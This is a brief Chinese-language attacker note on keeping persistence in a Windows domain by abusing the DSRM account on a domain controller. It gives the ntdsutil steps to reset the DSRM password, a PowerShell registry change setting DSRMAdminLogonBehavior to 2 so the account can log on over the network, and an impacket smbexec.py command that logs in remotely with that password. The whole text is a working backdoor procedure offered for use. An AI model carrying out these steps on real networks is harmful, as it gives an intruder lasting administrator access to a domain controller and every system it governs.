修改 DSRM 密码进行域维权
DSRM 账号就是域控机器的本地管理员账户。
# 重置 DSRM 密码 ntdsutil 输入 " set DSRM password ", 回车 输入 " reset password on server null ",回车 输入两次新密码,回车,然后退出即可。 我重置的密码是:p-0p-0p-0p-0
修改注册表,使得 DSRM 账号可以网络登录域控。
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -name "DSRMAdminlogonbehavior" -value 2 -propertyType DWORD
登录
python3 smbexec.py DC01/administrator:p-0p-0p-0p-0@192.168.72.21 -codec gbk